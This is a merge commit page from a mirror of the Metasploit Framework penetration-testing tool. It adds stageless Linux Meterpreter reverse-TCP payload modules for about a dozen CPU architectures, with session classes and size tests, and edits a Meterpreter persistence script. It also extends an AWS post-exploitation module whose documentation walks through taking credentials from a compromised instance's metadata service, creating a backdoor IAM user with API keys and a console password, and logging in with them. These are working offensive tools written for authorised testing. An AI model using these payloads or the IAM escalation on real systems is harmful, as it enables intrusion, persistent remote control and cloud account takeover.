infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/rapid7/metasploit-framework

bug/bundler_fix
Dennis Herrmann 2016-12-13 22:20:37 +01:00
parent ce202cb9b2 082a8949e4
commit ac324cb371
21 changed files with 808 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

55
documentation/modules/post/multi/escalate/aws_create_iam_user.md
View File

@ -113,6 +113,11 @@ Active sessions
## Options
By default the module will:
* create a randomly named IAM user and group
* generate API Keys and User password for after
In the event that the session'd AWS instance does not have an IAM role assigned
to it with sufficient privileges, the following options can be used to provide
specific authentication material:
@ -124,9 +129,30 @@ specific authentication material:
The following options control the account that is being created:
* `IAM_USERNAME`: set this if you would like to control the username for to user to be created
* `IAM_PASSWORD`: set this if you would like to control the password for the created user
* `CREATE_API`: when true, creates API keys for this user
* `CREATE_CONSOLE`: when true, creates a password for this user so that they can access the AWS console
```
msf exploit(sshexec) > use post/multi/escalate/aws_create_iam_user
msf post(aws_create_iam_user) > show options
Module options (post/multi/escalate/aws_create_iam_user):
Name Current Setting Required Description
---- --------------- -------- -----------
AccessKeyId no AWS access key
CREATE_API true yes Add access key ID and secret access key to account (API, CLI, and SDK access)
CREATE_CONSOLE true yes Create an account with a password for accessing the AWS management console
IAM_GROUPNAME no Name of the group to be created (leave empty or unset to use a random name)
IAM_PASSWORD no Password to set for the user to be created (leave empty or unset to use a random name)
IAM_USERNAME no Name of the user to be created (leave empty or unset to use a random name)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SESSION yes The session to run this module on.
SecretAccessKey no AWS secret key
Token no AWS session token
```
## Abusing an Overly Permissive Instance Profile
@ -136,7 +162,6 @@ overly permissive access. Once a session is established, we can load
e.g., `SESSION 1` and run the exploit.
```
msf exploit(sshexec) > use auxiliary/admin/aws/aws_create_iam_user
msf post(aws_create_iam_user) > set SESSION 1
SESSION => 1
msf post(aws_create_iam_user) > exploit
@ -195,7 +220,6 @@ SecretAccessKey => jhsdlfjkhalkjdfhalskdhfjalsjkakhksdfhlah
msf post(aws_create_iam_user) > set SESSION 1
SESSION => 1
msf post(aws_create_iam_user) > run
msf post(aws_create_iam_user) > run
[*] 169.254.169.254 - looking for creds...
[*] Creating user: bZWsmzyupDWxe8CT
@ -222,6 +246,7 @@ bZWsmzyupDWxe8CT bZWsmzyupDWxe8CT 74FXOTagsYCzxz0pjPOmnsASewj4Dq/JzH3Q24qj AK
Information necessary to use the created account is printed to the screen and stored in loot:
```
$ cat ~/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
{
"UserName": "As56ekIV59OgoFOj",
"GroupName": "As56ekIV59OgoFOj",
@ -229,5 +254,31 @@ Information necessary to use the created account is printed to the screen and st
"AccessKeyId": "AKIAIVNMYXYBXYE7VCHQ",
"Password": "As56ekIV59OgoFOj",
"AccountId": "xxx"
```
These creds can be used to call the AWS API directly or you can login using the console.
Configuring the CLI:
```
$ aws configure --profile test
AWS Access Key ID [None]: AKIA...
AWS Secret Access Key [None]: THE SECRET ACCESS KEY...
Default region name [None]: us-west-2
Default output format [None]: json
```
Call the API, e.g., get the Account ID:
```
$ aws iam --profile test list-account-aliases
{
"AccountAliases": [
"Account_ID"
]
}
```
Login via the console using the username and password:
Go to the AWS Console at https://Account_ID.signin.aws.amazon.com/console/ and login.

30
lib/msf/base/sessions/meterpreter_aarch64_linux.rb Normal file
View File

@ -0,0 +1,30 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_aarch64_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'linux'
self.base_arch = ARCH_AARCH64
end
end
end
end

29
lib/msf/base/sessions/meterpreter_armbe_linux.rb Normal file
View File

@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_armbe_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'linux'
self.base_arch = ARCH_ARMBE
end
end
end
end

29
lib/msf/base/sessions/meterpreter_mips64_linux.rb Normal file
View File

@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_mips64_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'linux'
self.base_arch = ARCH_MIPS64
end
end
end
end

29
lib/msf/base/sessions/meterpreter_ppc64le_linux.rb Normal file
View File

@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_ppc64le_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'linux'
self.base_arch = ARCH_PPC64LE
end
end
end
end

29
lib/msf/base/sessions/meterpreter_ppc_linux.rb Normal file
View File

@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_ppc_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'linux'
self.base_arch = ARCH_PPC
end
end
end
end

29
lib/msf/base/sessions/meterpreter_zarch_linux.rb Normal file
View File

@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_zarch_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'linux'
self.base_arch = ARCH_ZARCH
end
end
end
end

41
modules/payloads/singles/linux/aarch64/mettle_reverse_tcp.rb Normal file
View File

@ -0,0 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_aarch64_linux'
module MetasploitModule
CachedSize = 292344
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter',
'Description' => 'Run the mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>'
],
'Platform' => 'linux',
'Arch' => ARCH_AARCH64,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_aarch64_Linux
)
)
end
def generate
MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config).to_binary :exec
end
end

41
modules/payloads/singles/linux/armbe/mettle_reverse_tcp.rb Normal file
View File

@ -0,0 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_armbe_linux'
module MetasploitModule
CachedSize = 285000
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter',
'Description' => 'Run the mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>'
],
'Platform' => 'linux',
'Arch' => ARCH_ARMBE,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_armbe_Linux
)
)
end
def generate
MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config).to_binary :exec
end
end

41
modules/payloads/singles/linux/armle/mettle_reverse_tcp.rb Normal file
View File

@ -0,0 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_armle_linux'
module MetasploitModule
CachedSize = 284152
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter',
'Description' => 'Run the mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>'
],
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_armle_Linux
)
)
end
def generate
MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config).to_binary :exec
end
end

41
modules/payloads/singles/linux/mips64/mettle_reverse_tcp.rb Normal file
View File

@ -0,0 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_mips64_linux'
module MetasploitModule
CachedSize = 504960
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter',
'Description' => 'Run the mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>'
],
'Platform' => 'linux',
'Arch' => ARCH_MIPS64,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_mips64_Linux
)
)
end
def generate
MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config).to_binary :exec
end
end

41
modules/payloads/singles/linux/mipsbe/mettle_reverse_tcp.rb Normal file
View File

@ -0,0 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_mipsbe_linux'
module MetasploitModule
CachedSize = 484668
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter',
'Description' => 'Run the mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>'
],
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux
)
)
end
def generate
MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config).to_binary :exec
end
end

41
modules/payloads/singles/linux/mipsle/mettle_reverse_tcp.rb Normal file
View File

@ -0,0 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_mipsle_linux'
module MetasploitModule
CachedSize = 484732
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter',
'Description' => 'Run the mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>'
],
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_mipsle_Linux
)
)
end
def generate
MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config).to_binary :exec
end
end

41
modules/payloads/singles/linux/ppc/mettle_reverse_tcp.rb Normal file
View File

@ -0,0 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_ppc_linux'
module MetasploitModule
CachedSize = 329724
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter',
'Description' => 'Run the mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>'
],
'Platform' => 'linux',
'Arch' => ARCH_PPC,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_ppc_Linux
)
)
end
def generate
MetasploitPayloads::Mettle.new('powerpc-linux-muslsf', generate_config).to_binary :exec
end
end

41
modules/payloads/singles/linux/ppc64le/mettle_reverse_tcp.rb Normal file
View File

@ -0,0 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_ppc64le_linux'
module MetasploitModule
CachedSize = 396160
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter',
'Description' => 'Run the mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>'
],
'Platform' => 'linux',
'Arch' => ARCH_PPC64LE,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_ppc64le_Linux
)
)
end
def generate
MetasploitPayloads::Mettle.new('powerpc64le-linux-musl', generate_config).to_binary :exec
end
end

41
modules/payloads/singles/linux/x64/mettle_reverse_tcp.rb Normal file
View File

@ -0,0 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_x64_mettle_linux'
module MetasploitModule
CachedSize = 289824
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter',
'Description' => 'Run the mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>'
],
'Platform' => 'linux',
'Arch' => ARCH_X64,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_x64_Mettle_Linux
)
)
end
def generate
MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config).to_binary :exec
end
end

41
modules/payloads/singles/linux/x86/mettle_reverse_tcp.rb Normal file
View File

@ -0,0 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_x86_mettle_linux'
module MetasploitModule
CachedSize = 292828
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter',
'Description' => 'Run the mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>'
],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_x86_Mettle_Linux
)
)
end
def generate
MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config).to_binary :exec
end
end

41
modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb Normal file
View File

@ -0,0 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_zarch_linux'
module MetasploitModule
CachedSize = 367864
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter',
'Description' => 'Run the mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>'
],
'Platform' => 'linux',
'Arch' => ARCH_ZARCH,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_zarch_Linux
)
)
end
def generate
MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config).to_binary :exec
end
end

22
modules/post/multi/escalate/aws_create_iam_user.rb
View File

@ -36,6 +36,8 @@ class MetasploitModule < Msf::Post
register_options(
[
OptString.new('IAM_USERNAME', [false, 'Name of the user to be created (leave empty or unset to use a random name)', '']),
OptString.new('IAM_PASSWORD', [false, 'Password to set for the user to be created (leave empty or unset to use a random name)', '']),
OptString.new('IAM_GROUPNAME', [false, 'Name of the group to be created (leave empty or unset to use a random name)', '']),
OptBool.new('CREATE_API', [true, 'Add access key ID and secret access key to account (API, CLI, and SDK access)', true]),
OptBool.new('CREATE_CONSOLE', [true, 'Create an account with a password for accessing the AWS management console', true]),
OptString.new('AccessKeyId', [false, 'AWS access key', '']),
@ -89,7 +91,7 @@ class MetasploitModule < Msf::Post
results['UserName'] = username
# create group
groupname = username
groupname = datastore['IAM_GROUPNAME'].blank? ? username : datastore['IAM_GROUPNAME']
print_status("Creating group: #{groupname}")
action = 'CreateGroup'
doc = call_iam(creds, 'Action' => action, 'GroupName' => groupname)
@ -97,11 +99,10 @@ class MetasploitModule < Msf::Post
results['GroupName'] = groupname
# create group policy
policyname = username
print_status("Creating group policy: #{policyname}")
print_status("Creating group policy")
pol_doc = datastore['IAM_GROUP_POL']
action = 'PutGroupPolicy'
doc = call_iam(creds, 'Action' => action, 'GroupName' => groupname, 'PolicyName' => policyname, 'PolicyDocument' => URI.encode(pol_doc))
doc = call_iam(creds, 'Action' => action, 'GroupName' => groupname, 'PolicyName' => 'Policy', 'PolicyDocument' => URI.encode(pol_doc))
print_results(doc, action)
# add user to group
@ -117,24 +118,27 @@ class MetasploitModule < Msf::Post
action = 'CreateAccessKey'
response = call_iam(creds, 'Action' => action, 'UserName' => username)
doc = print_results(response, action)
results['SecretAccessKey'] = doc['SecretAccessKey']
results['AccessKeyId'] = doc['AccessKeyId']
if doc
results['SecretAccessKey'] = doc['SecretAccessKey']
results['AccessKeyId'] = doc['AccessKeyId']
end
end
if datastore['CREATE_CONSOLE']
print_status("Creating password for #{username}")
password = username
password = datastore['IAM_PASSWORD'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_PASSWORD']
action = 'CreateLoginProfile'
response = call_iam(creds, 'Action' => action, 'UserName' => username, 'Password' => password)
doc = print_results(response, action)
results['Password'] = password
results['Password'] = password if doc
end
action = 'GetUser'
response = call_iam(creds, 'Action' => action, 'UserName' => username)
doc = print_results(response, action)
return if doc.nil?
arn = doc['Arn']
results['AccountId'] = arn[/^arn:aws:iam::(\d+):/,1]
results['AccountId'] = arn[/^arn:aws:iam::(\d+):/, 1]
keys = results.keys
table = Rex::Text::Table.new(

8
scripts/meterpreter/persistence.rb
View File

@ -40,7 +40,6 @@ script_on_target = nil
"-T" => [ true, "Alternate executable template to use"],
"-P" => [ true, "Payload to use, default is windows/meterpreter/reverse_tcp."]
)
meter_type = client.platform
################## Function Declarations ##################
@ -54,7 +53,7 @@ end
# Wrong Meterpreter Version Message Function
#-------------------------------------------------------------------------------
def wrong_meter_version(meter = meter_type)
def wrong_meter_version(meter)
print_error("#{meter} version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
@ -227,7 +226,10 @@ end
}
# Check for Version of Meterpreter
wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
unless client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch)
wrong_meter_version(client.session_type)
end
print_status("Running Persistence Script")
# Create undo script
@clean_up_rc = log_file()

111
spec/modules/payloads_spec.rb
View File

@ -4248,6 +4248,26 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'windows/meterpreter/reverse_winhttps'
end
context 'linux/aarch64/mettle_reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/linux/aarch64/mettle_reverse_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/aarch64/mettle_reverse_tcp'
end
context 'linux/armbe/mettle_reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/linux/armbe/mettle_reverse_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/armbe/mettle_reverse_tcp'
end
context 'linux/armle/mettle/bind_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -4270,6 +4290,26 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'linux/armle/mettle/reverse_tcp'
end
context 'linux/armle/mettle_reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/linux/armle/mettle_reverse_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/armle/mettle_reverse_tcp'
end
context 'linux/mips64/mettle_reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/linux/mips64/mettle_reverse_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/mips64/mettle_reverse_tcp'
end
context 'linux/mipsbe/mettle/reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -4281,6 +4321,16 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'linux/mipsbe/mettle/reverse_tcp'
end
context 'linux/mipsbe/mettle_reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/linux/mipsbe/mettle_reverse_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/mipsbe/mettle_reverse_tcp'
end
context 'linux/mipsle/mettle/reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -4292,6 +4342,36 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'linux/mipsle/mettle/reverse_tcp'
end
context 'linux/mipsle/mettle_reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/linux/mipsle/mettle_reverse_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/mipsle/mettle_reverse_tcp'
end
context 'linux/ppc/mettle_reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/linux/ppc/mettle_reverse_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/ppc/mettle_reverse_tcp'
end
context 'linux/ppc64le/mettle_reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/linux/ppc64le/mettle_reverse_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/ppc64le/mettle_reverse_tcp'
end
context 'linux/x64/mettle/bind_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -4314,6 +4394,16 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'linux/x64/mettle/reverse_tcp'
end
context 'linux/x64/mettle_reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/linux/x64/mettle_reverse_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/x64/mettle_reverse_tcp'
end
context 'linux/x86/mettle/bind_ipv6_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -4423,4 +4513,25 @@ RSpec.describe 'modules/payloads', :content do
modules_pathname: modules_pathname,
reference_name: 'linux/x86/mettle/reverse_tcp_uuid'
end
context 'linux/x86/mettle_reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/linux/x86/mettle_reverse_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/x86/mettle_reverse_tcp'
end
context 'linux/zarch/mettle_reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/linux/zarch/mettle_reverse_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/zarch/mettle_reverse_tcp'
end
end